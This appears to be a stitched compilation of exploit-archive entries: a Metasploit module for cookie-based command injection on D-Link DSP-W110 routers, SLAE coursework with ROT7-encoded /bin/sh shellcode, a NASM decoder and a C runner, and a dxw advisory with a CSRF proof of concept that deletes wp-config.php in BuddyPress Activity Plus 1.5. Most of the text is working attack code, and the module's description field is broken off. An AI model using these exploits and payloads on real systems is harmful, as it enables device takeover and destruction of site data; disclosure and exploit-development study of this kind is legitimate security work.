require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = NormalRanking

include Msf::Exploit::Remote::HttpClient

include Msf::Exploit::CmdStager

def initialize(info = {})

super(update_info(info,

'Name' => 'D-Link Cookie Command Execution',

'Description' => %q{

'Author' =>

[

'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # vulnerability discovery and initial PoC

'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module

],

'License' => MSF_LICENSE,

'Platform' => 'linux',

'References' =>

[

['URL', 'https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110'] # blog post including PoC

],

'DisclosureDate' => 'Jun 12 2015',

'Payload' =>

{

'DisableNops' => true

},

'Targets' =>

[

[ 'MIPS Little Endian', # unknown if there are LE devices out there ... but in case we have a target

{

'Platform' => 'linux',

'Arch' => ARCH_MIPSLE

}

],

[ 'MIPS Big Endian',

{

'Platform' => 'linux',

'Arch' => ARCH_MIPSBE

}

]

],

'DefaultTarget' => 1

))

end

def check

begin

res = send_request_cgi({

'uri' => '/',

'method' => 'GET'

})

if res && res.headers["Server"] =~ /lighttpd\/1\.4\.34/

return Exploit::CheckCode::Detected

end

rescue ::Rex::ConnectionError

return Exploit::CheckCode::Unknown

end

Exploit::CheckCode::Unknown

end

def exploit

print_status("#{peer} - Trying to access the device ...")

unless check == Exploit::CheckCode::Detected

fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")

end

print_status("#{peer} - Uploading stager ...")

@counter = 1

execute_cmdstager(

:flavor => :echo,

:linemax => 95 # limited by our upload, larger payloads crash the web server

)

print_status("#{peer} - creating payload and executing it ...")

(1 .. @counter).each do |act_file|

# the http server blocks access to our files ... we copy it to a new one

# the length of our command is restricted to 19 characters

cmd = "cp /t*/#{act_file} /tmp/#{act_file+@counter}"

execute_final_command(cmd)

cmd = "chmod +x /tmp/#{act_file+@counter}"

execute_final_command(cmd)

cmd = "/tmp/#{act_file+@counter}"

execute_final_command(cmd)

cmd = "rm /tmp/#{act_file}"

execute_final_command(cmd)

cmd = "rm /tmp/#{act_file+@counter}"

execute_final_command(cmd)

end

end

def execute_command(cmd,opts)

# upload our stager to a shell script

# upload takes quite long because there is no response from the web server

file_upload = "#!/bin/sh\n"

file_upload << cmd << "\n"

post_data = Rex::MIME::Message.new

post_data.add_part(file_upload, nil, "binary", "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{@counter}\"")

post_data.bound = "-#{rand_text_alpha(12)}--"

file = post_data.to_s

@counter = @counter + 1

begin

send_request_cgi({

'method' => 'POST',

'uri' => "/web_cgi.cgi",

'vars_get' => {

'&request' =>'UploadFile',

'path' => '/tmp/'

},

'encode_params' => false,

'ctype' => "multipart/form-data; boundary=#{post_data.bound}",

'data' => file

})

rescue ::Rex::ConnectionError

fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")

end

end

def execute_final_command(cmd)

# very limited space - larger commands crash the webserver

fail_with(Failure::Unknown, "#{peer} - Generated command for injection is too long") if cmd.length > 18

begin

send_request_cgi({

'method' => 'GET',

'uri' => "/",

'cookie' => "i=`#{cmd}`"

}, 5)

rescue ::Rex::ConnectionError

fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")

end

end

https://github.com/adeptex/SLAE/tree/master/Assignment-6/rot7

This code was created as an exercise for the SecurityTube Linux Assembly

Expert (SLAE).

The following will produce rot7-encoded shellcode using a custom scheme to

dynamically set the shellcode length. The length is used by the decoder to

determine when it should stop decoding.

shellcode = (

"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31"

"\xc9\x89\xca\x6a\x0b\x58\xcd\x80"

)

encoded = "\\x%02x," % len(bytearray(shellcode))

encoded2 = "0x%02x," % len(bytearray(shellcode))

print 'Encoded shellcode ...'

for x in bytearray(shellcode) :

if x > 248:

encoded += '\\x'

encoded += '%02x' %(7 -(256 - x))

encoded2 += '0x'

encoded2 += '%02x,' %(7 -(256 - x))

else:

encoded += '\\x'

encoded += '%02x'%(x+7)

encoded2 += '0x'

encoded2 += '%02x,' %(x+7)

print '\n%s\n\n%s\n\nShellcode Length: %d\n' % (encoded, encoded2,

len(bytearray(shellcode)))

The following is the NASM decoder:

; ROT7 NASM decoder

global _start

section .text

_start:

jmp short stage

decoder:

pop esi ; shellcode address

mov al, byte [esi] ; shellcode length

xor ecx, ecx ; position

decode:

mov bl, byte [esi+ecx+1] ; get rot'ed byted

sub bl, 0x7 ; rot it back (-7)

mov byte [esi+ecx], bl ; store it in shellcode

inc ecx ; next position

cmp al, cl ; check if reached the end of shellcode

jnz short decode ; if not, continue derot'ing

jmp shellcode ; else, execute derot'ed shellcode

stage:

call decoder

; Shellcode Format:

; byte[0] = length of shellcode (max 0xff)

; byte[1..] = rot'ed shellcode

shellcode: db

0x18,0x38,0xc7,0x57,0x6f,0x36,0x36,0x7a,0x6f,0x6f,0x36,0x69,0x70,0x75,0x90,0xea,0x38,0xd0,0x90,0xd1,0x71,0x12,0x5f,0xd4,0x87

* Sample run

* Compile with: gcc rot7.c -o rot7

unsigned char code[] = \

"\xeb\x16\x5e\x8a\x06\x31\xc9\x8a\x5c\x0e\x01\x80\xeb\x07\x88\x1c\x0e\x41\x38\xc8\x75\xf1\xeb\x05\xe8\xe5\xff\xff\xff\x18\x38\xc7\x57\x6f\x36\x36\x7a\x6f\x6f\x36\x69\x70\x75\x90\xea\x38\xd0\x90\xd1\x71\x12\x5f\xd4\x87";

int main()

{

printf("Shellcode Length: %d\n", strlen(code));

int (*ret)() = (int(*)())code;

ret();

}

Details

================

Software: BuddyPress Activity Plus

Version: 1.5

Homepage: http://wordpress.org/plugins/buddypress-activity-plus/

Advisory report: https://security.dxw.com/advisories/csrf-and-arbitrary-file-deletion-in-buddypress-activity-plus-1-5/

CVE: Awaiting assignment

CVSS: 8.5 (High; AV:N/AC:L/Au:N/C:N/I:P/A:C)

Description

================

CSRF and arbitrary file deletion in BuddyPress Activity Plus 1.5

Vulnerability

================

An attacker can delete any file the PHP process can delete.

For this to happen, a logged-in user would have to be tricked into clicking on a link controlled by the attacker. It is easy to make these links very convincing.

Proof of concept

================

Ensure your PHP user can do maximum damage:

sudo chown www-data:www-data /var/vhosts/my-wordpress-site

Visit a page containing this as a logged-in user and click submit:

<form method=\"POST\" action=\"http://localhost/wp-admin/admin-ajax.php\">

<input type=\"text\" name=\"action\" value=\"bpfb_remove_temp_images\">

<input type=\"text\" name=\"data\" value=\"bpfb_photos[]=../../../../wp-config.php\">

<input type=\"submit\">

</form>

If the server is set up so that the php user has more restricted permissions, then an attacker will at least be able to delete files from the uploads directory.

Note that you can also delete as many things as you like at once – $_POST[‘data’] is run through parse_str() which parses it as a query string, so just keep adding “&bpfb_photos[]=path/to/file” to the end until you have all known files.

There is an identical attack available only when BP Group Documents is also installed. Just replace “bpfb_remove_temp_images” with “bpfb_remove_temp_documents” and in data replace “bpfb_photos” with “bpfb_documents”.

Mitigations

================

Upgrade to version 1.6.2 or later

If this is not possible, ensure that the PHP user on the server does not have permission to delete files like wp-config.php.

Disclosure policy

================

dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report with 14 days.

Timeline

================

2013-08-22: Discovered

2015-07-13: Reported to vendor via contact form at https://premium.wpmudev.org/contact/

2015-07-13: Requested CVE

2015-07-13: Vendor responded

2015-07-14: Vendor reported issue fixed

2015-07-14: Published

Discovered by dxw:

================

Tom Adams

Please visit security.dxw.com for more information.